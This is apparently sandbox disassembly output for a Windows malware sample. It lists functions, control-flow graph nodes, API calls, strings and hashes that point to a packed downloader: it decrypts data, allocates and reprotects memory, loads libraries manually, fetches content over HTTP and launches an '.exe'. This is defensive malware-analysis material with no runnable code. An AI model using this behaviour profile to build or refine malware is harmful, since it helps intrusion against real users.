                                            control_flow_graph 2391 4035b0-403638 CryptAcquireContextW 2392 4036fa-403710 GetLastError CryptReleaseContext 2391->2392 2393 40363e-40365c CryptCreateHash 2391->2393 2394 403844-40384a 2392->2394 2393->2392 2395 403662-403675 2393->2395 2396 403874-403891 call 4099d7 2394->2396 2397 40384c-403858 2394->2397 2398 403678-40367d 2395->2398 2399 40386a-403871 call 409b3c 2397->2399 2400 40385a-403868 2397->2400 2398->2398 2401 40367f-4036c6 call 409b4a call 40fcdf CryptHashData 2398->2401 2399->2396 2400->2399 2403 403892-4038a5 call 40cfaf 2400->2403 2415 4036d6-4036f8 CryptDeriveKey 2401->2415 2416 4036c8-4036d1 GetLastError 2401->2416 2412 4038a7-4038ae 2403->2412 2413 4038b8 2403->2413 2412->2413 2420 4038b0-4038b4 2412->2420 2415->2392 2417 403715-403716 call 40fb0d 2415->2417 2416->2394 2421 40371b-403767 call 40afb0 call 409b4a 2417->2421 2420->2413 2426 403838-40383e CryptDestroyKey 2421->2426 2427 40376d-40377c 2421->2427 2426->2394 2428 403782-40378b 2427->2428 2429 403799-4037d4 call 40afb0 CryptDecrypt 2428->2429 2430 40378d-40378f 2428->2430 2429->2426 2433 4037d6-403801 call 40afb0 2429->2433 2430->2429 2433->2426 2436 403803-403832 2433->2436 2436->2426 2436->2428
                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,CA335CE0), ref: 00403630
                                            • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403654
                                            • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036BE
                                            • GetLastError.KERNEL32 ref: 004036C8
                                            • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004036F0
                                            • GetLastError.KERNEL32 ref: 004036FA
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040370A
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037CC
                                            • CryptDestroyKey.ADVAPI32(?), ref: 0040383E
                                            Strings
                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040360C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                            • API String ID: 3761881897-63410773
                                            • Opcode ID: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                            • Instruction ID: 8181a1f98bd0149a833479ac616fd79743055c61a592a1420c0c523c4d9566d8
                                            • Opcode Fuzzy Hash: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                            • Instruction Fuzzy Hash: 37819171A00218AFEF209F25CC45B9ABBB9FF45300F0081BAF90DA7291DB359E858F55
                                            Function 00402A20 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2437 402a20-402a37 2438 402a79-402a8d call 4099d7 2437->2438 2439 402a39-402a42 2437->2439 2440 402a44-402a49 2439->2440 2441 402a8e-402ad0 VirtualProtect 2439->2441 2440->2438 2443 402a4b-402a50 2440->2443 2441->2438 2445 402ad2-402af4 GetLastError FormatMessageA 2441->2445 2447 402a52-402a5a 2443->2447 2448 402a66-402a73 call 402e50 2443->2448 2446 402af7-402afc 2445->2446 2446->2446 2449 402afe-402b4a LocalAlloc call 4029b0 OutputDebugStringA LocalFree * 2 call 4099d7 2446->2449 2447->2448 2450 402a5c-402a64 2447->2450 2453 402a75 2448->2453 2450->2448 2452 402a78 2450->2452 2452->2438 2453->2452
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AC8
                                            • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402ADD
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402AEB
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B06
                                            • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B25
                                            • LocalFree.KERNEL32(00000000), ref: 00402B32
                                            • LocalFree.KERNEL32(?), ref: 00402B37
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                            • String ID: %s: %s$Error protecting memory page
                                            • API String ID: 839691724-1484484497
                                            • Opcode ID: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                            • Instruction ID: 0c0000675eadf2e66051917e59d7aa22c0aaa2fc97c5d5fe75df83e4770fcd9e
                                            • Opcode Fuzzy Hash: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                            • Instruction Fuzzy Hash: 4B310731B00104AFDB10DF68DD44FAAB768EF48704F0541BEE905AB2D2DB75AE06CB98
                                            Function 00401940 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2630 401940-401a18 InternetSetFilePointer InternetReadFile 2632 401a50-401a9d call 40b530 HttpQueryInfoA 2630->2632 2636 401aa3-401ad6 CoCreateInstance 2632->2636 2637 401dea-401e16 call 4099d7 2632->2637 2636->2637 2638 401adc-401ae3 2636->2638 2638->2637 2640 401ae9-401b06 2638->2640 2642 401b10-401b15 2640->2642 2642->2642 2643 401b17-401bde call 402730 call 4015e0 2642->2643 2651 401be0-401bef 2643->2651 2652 401c0f-401c11 2643->2652 2655 401bf1-401bff 2651->2655 2656 401c05-401c0c call 409b3c 2651->2656 2653 401c17-401c1e 2652->2653 2654 401dde-401de5 2652->2654 2653->2654 2657 401c24-401c9a call 409b4a 2653->2657 2654->2637 2655->2656 2658 401e19-401e1f call 40cfaf 2655->2658 2656->2652 2666 401ca0-401cb4 2657->2666 2667 401dc4-401dda call 4099e5 2657->2667 2669 401cba-401ce9 call 409b4a 2666->2669 2670 401d5e-401d75 2666->2670 2667->2654 2681 401d4a-401d5b call 4099e5 2669->2681 2682 401ceb-401ced 2669->2682 2671 401d77-401d79 2670->2671 2672 401dba-401dc2 2670->2672 2675 401d88-401d8a 2671->2675 2676 401d7b-401d86 call 40d09d 2671->2676 2672->2667 2679 401d8c-401d9c call 40afb0 2675->2679 2680 401d9e-401daf call 40b530 call 40d09d 2675->2680 2690 401db5 call 40cf9f 2676->2690 2679->2672 2680->2690 2681->2670 2686 401d05-401d1d call 40b530 2682->2686 2687 401cef-401cf1 2682->2687 2700 401d2c-401d38 2686->2700 2701 401d1f-401d2a call 40d09d 2686->2701 2687->2686 2693 401cf3-401d03 call 40afb0 2687->2693 2690->2672 2693->2681 2700->2681 2704 401d3a-401d3f call 40d09d 2700->2704 2707 401d45 call 40cf9f 2701->2707 2704->2707 2707->2681
                                            APIs
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004019D5
                                            • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004019F8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FileInternet$PointerRead
                                            • String ID: text
                                            • API String ID: 3197321146-999008199
                                            • Opcode ID: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                            • Instruction ID: 0125e10c814f2167b0c83c61a86ba883da1fe49b2781431745f5a2561ed14111
                                            • Opcode Fuzzy Hash: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                            • Instruction Fuzzy Hash: FAC15B709002189FDB24DF64CC85BD9B7B5EF49304F1041EAE509B72A1D778AE94CF99
                                            Function 00F0D08E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00F0D0B6
                                            • Module32First.KERNEL32(00000000,00000224), ref: 00F0D0D6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F0C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f0c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: 3832b7c1d5ea91ef92033f612d840d2ae5a1a5d200003defcc347414a5a68a43
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 09F09C315007106BD7303BF9DC8DB6E76ECAF45774F500529F656950C0D770EC466A51
                                            Function 00408770 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: emp$mixtwo
                                            • API String ID: 3472027048-2390925073
                                            • Opcode ID: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                            • Instruction ID: d670b023532553bde9b5cd74a18030282768016b503e3e09e149c4df20b712b6
                                            • Opcode Fuzzy Hash: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                            • Instruction Fuzzy Hash: 15F01CB161430457E7147F65ED1B7173EA4970271CFA006ADD8141F2C2E7FB861A8BE6
                                            Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                            • __cftof.LIBCMT ref: 10001624
                                            • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                            • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                            • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                            • String ID: GET$http://
                                            • API String ID: 1233269984-1632879366
                                            • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                            • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                            • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                            • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                            Function 00401800 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401873
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401899
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018BF
                                              • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 00402599
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018E5
                                            Strings
                                            • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401832
                                            • text, xrefs: 00401B5F
                                            • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018C3
                                            • GET, xrefs: 004020B7
                                            • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401877
                                            • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0040189D
                                            • http://, xrefs: 00401EC4, 004021A3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                            • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                            • API String ID: 2146599340-4172842843
                                            • Opcode ID: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                            • Instruction ID: d9449a1bc553b4f7263359658e85a8d5597bae1f9675cad689ed873ec2693fe7
                                            • Opcode Fuzzy Hash: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                            • Instruction Fuzzy Hash: A4316371D00109AFEB14DBE9CC85FEEB7B9EB08714F60812AE521731C0C7789945CBA4
                                            Function 04B3003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2458 4b3003c-4b30047 2459 4b30049 2458->2459 2460 4b3004c-4b30263 call 4b30a3f call 4b30e0f call 4b30d90 VirtualAlloc 2458->2460 2459->2460 2475 4b30265-4b30289 call 4b30a69 2460->2475 2476 4b3028b-4b30292 2460->2476 2480 4b302ce-4b303c2 VirtualProtect call 4b30cce call 4b30ce7 2475->2480 2478 4b302a1-4b302b0 2476->2478 2479 4b302b2-4b302cc 2478->2479 2478->2480 2479->2478 2487 4b303d1-4b303e0 2480->2487 2488 4b303e2-4b30437 call 4b30ce7 2487->2488 2489 4b30439-4b304b8 VirtualFree 2487->2489 2488->2487 2491 4b305f4-4b305fe 2489->2491 2492 4b304be-4b304cd 2489->2492 2493 4b30604-4b3060d 2491->2493 2494 4b3077f-4b30789 2491->2494 2496 4b304d3-4b304dd 2492->2496 2493->2494 2497 4b30613-4b30637 2493->2497 2499 4b307a6-4b307b0 2494->2499 2500 4b3078b-4b307a3 2494->2500 2496->2491 2501 4b304e3-4b30505 LoadLibraryA 2496->2501 2506 4b3063e-4b30648 2497->2506 2502 4b307b6-4b307cb 2499->2502 2503 4b3086e-4b308be LoadLibraryA 2499->2503 2500->2499 2504 4b30517-4b30520 2501->2504 2505 4b30507-4b30515 2501->2505 2507 4b307d2-4b307d5 2502->2507 2514 4b308c7-4b308f9 2503->2514 2508 4b30526-4b30547 2504->2508 2505->2508 2506->2494 2509 4b3064e-4b3065a 2506->2509 2510 4b307d7-4b307e0 2507->2510 2511 4b30824-4b30833 2507->2511 2512 4b3054d-4b30550 2508->2512 2509->2494 2513 4b30660-4b3066a 2509->2513 2515 4b307e2 2510->2515 2516 4b307e4-4b30822 2510->2516 2520 4b30839-4b3083c 2511->2520 2517 4b305e0-4b305ef 2512->2517 2518 4b30556-4b3056b 2512->2518 2519 4b3067a-4b30689 2513->2519 2521 4b30902-4b3091d 2514->2521 2522 4b308fb-4b30901 2514->2522 2515->2511 2516->2507 2517->2496 2523 4b3056f-4b3057a 2518->2523 2524 4b3056d 2518->2524 2525 4b30750-4b3077a 2519->2525 2526 4b3068f-4b306b2 2519->2526 2520->2503 2527 4b3083e-4b30847 2520->2527 2522->2521 2529 4b3059b-4b305bb 2523->2529 2530 4b3057c-4b30599 2523->2530 2524->2517 2525->2506 2531 4b306b4-4b306ed 2526->2531 2532 4b306ef-4b306fc 2526->2532 2533 4b3084b-4b3086c 2527->2533 2534 4b30849 2527->2534 2541 4b305bd-4b305db 2529->2541 2530->2541 2531->2532 2535 4b3074b 2532->2535 2536 4b306fe-4b30748 2532->2536 2533->2520 2534->2503 2535->2519 2536->2535 2541->2512
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B3024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691
                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction ID: 9eb7919d6673eaec71df6afce548f9cef3c06e461b068f5ec655ac0c4be58a91
                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction Fuzzy Hash: 49527974A01229DFDB64CF69C984BACBBB1BF09305F1480D9E90DAB355DB30AA85DF14
                                            Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2542 10001175-100011a6 call 1000e8e7 2545 100011a8-100011bd call 1000270d 2542->2545 2546 100011bf 2542->2546 2548 100011c5-100011dd InternetSetFilePointer 2545->2548 2546->2548 2550 100011e3-1000121b InternetReadFile 2548->2550 2551 10001253-1000125a 2550->2551 2552 1000121d-1000124d call 1000270d call 100050e0 call 10002724 2550->2552 2553 10001260-100012a0 call 10003c40 HttpQueryInfoA 2551->2553 2554 1000125c-1000125e 2551->2554 2552->2551 2560 100012a6-100012d2 CoCreateInstance 2553->2560 2561 1000150a-10001520 call 1000e8a5 2553->2561 2554->2550 2554->2553 2560->2561 2563 100012d8-100012df 2560->2563 2563->2561 2567 100012e5-10001316 call 1000184b call 10001006 2563->2567 2573 10001318 2567->2573 2574 1000131a-10001351 call 10001c08 call 10001bb9 2567->2574 2573->2574 2580 10001357-1000135e 2574->2580 2581 100014fe-10001505 2574->2581 2580->2581 2582 10001364-100013cc call 1000270d 2580->2582 2581->2561 2586 100013d2-100013e8 2582->2586 2587 100014e6-100014f9 call 10002724 2582->2587 2589 10001486-10001497 2586->2589 2590 100013ee-1000141d call 1000270d 2586->2590 2587->2581 2591 10001499-1000149b 2589->2591 2592 100014dc-100014e4 2589->2592 2601 1000146e-10001483 call 10002724 2590->2601 2602 1000141f-10001421 2590->2602 2595 100014aa-100014ac 2591->2595 2596 1000149d-100014a8 call 10005926 2591->2596 2592->2587 2599 100014c0-100014d1 call 10003c40 call 10005926 2595->2599 2600 100014ae-100014be call 100050e0 2595->2600 2612 100014d7 call 1000584c 2596->2612 2599->2612 2600->2592 2601->2589 2603 10001423-10001425 2602->2603 2604 10001434-10001447 call 10003c40 2602->2604 2603->2604 2609 10001427-10001432 call 100050e0 2603->2609 2621 10001456-1000145c 2604->2621 2622 10001449-10001454 call 10005926 2604->2622 2609->2601 2612->2592 2621->2601 2624 1000145e-10001463 call 10005926 2621->2624 2627 10001469 call 1000584c 2622->2627 2624->2627 2627->2601
                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                            • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                            • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                            • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                            • String ID: text
                                            • API String ID: 1154000607-999008199
                                            • Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                            • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                            • Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                            • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                            Function 00405A30 Relevance: 8.2, APIs: 2, Strings: 3, Instructions: 678sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,CA335CE0), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: SUB=$get$U%
                                            • API String ID: 2563648476-1840017472
                                            • Opcode ID: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                            • Instruction ID: c38411781881cdafda6c84006562c20812e5f10be50bcbbeaff71a156a434d29
                                            • Opcode Fuzzy Hash: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                            • Instruction Fuzzy Hash: 04323171D101089BCB19FBB5C95AADE73786F14308F50817FE856771C2EE7C6A08CAA9
                                            Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                              • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: .exe$open
                                            • API String ID: 1627157292-49952409
                                            • Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                            • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                            • Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                            • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                            Function 00401E20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3520 401e20-401e6e 3521 401e70-401e75 3520->3521 3521->3521 3522 401e77-402149 call 402730 * 2 call 40afb0 call 40d0b0 InternetOpenA 3521->3522 3535 402173-402190 call 4099d7 3522->3535 3536 40214b-402157 3522->3536 3537 402169-402170 call 409b3c 3536->3537 3538 402159-402167 3536->3538 3537->3535 3538->3537 3540 402198-4021c9 call 40cfaf call 401e20 3538->3540
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: http://
                                            • API String ID: 0-1121587658
                                            • Opcode ID: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                            • Instruction ID: 09126ff878240097ddd60f0c8300d9112e53121ff3c2cf1df5c9ef382bee38eb
                                            • Opcode Fuzzy Hash: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                            • Instruction Fuzzy Hash: 1A518E71E002099FDF14CFA9C895BEEB7B9EB08304F10812EE915BB6C1C779A944CB94
                                            Function 00A74916 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3549 a74916-a74f4d VirtualProtect call a74f5d 3555 a74f52-a74fd7 3549->3555 3558 a74fe4-a74ff1 3555->3558 3559 a74fdd-a74fe2 3555->3559 3560 a75319-a75326 3558->3560 3559->3558
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00A74F3F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A1000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_9a1000_file.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: 8Fv$V
                                            • API String ID: 544645111-3398435390
                                            • Opcode ID: b4c34d119810beef33784acd1749f885a1c3ba7ffe71e30b057a327d9581066c
                                            • Instruction ID: 9c766cefefc2af98bee0e2b92da4695b8d6d488210f3149119d3ad04493b1807
                                            • Opcode Fuzzy Hash: b4c34d119810beef33784acd1749f885a1c3ba7ffe71e30b057a327d9581066c
                                            • Instruction Fuzzy Hash: 6B21F371108209DFCB119F28CC44A6EBBF0FF18300F50C55EE68587A61DB72AC20DB56
                                            Function 009A7223 Relevance: 4.6, APIs: 3, Instructions: 67registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3562 9a7223-9a9b79 3565 9a9b7b-9a9b96 RegOpenKeyA 3562->3565 3566 9a9ba2-9a9bbd RegOpenKeyA 3562->3566 3565->3566 3567 9a9b98 3565->3567 3568 9a9bbf-9a9bc9 3566->3568 3569 9a9bd5-9a9c01 3566->3569 3567->3566 3568->3569 3572 9a9c0e-9a9c18 3569->3572 3573 9a9c03-9a9c0c GetNativeSystemInfo 3569->3573 3574 9a9c1a 3572->3574 3575 9a9c24-9a9c32 3572->3575 3573->3572 3574->3575 3577 9a9c3e-9a9c45 3575->3577 3578 9a9c34 3575->3578 3579 9a9c4b-9a9c52 3577->3579 3580 9a9c58-9aab26 3577->3580 3578->3577 3579->3580
                                            APIs
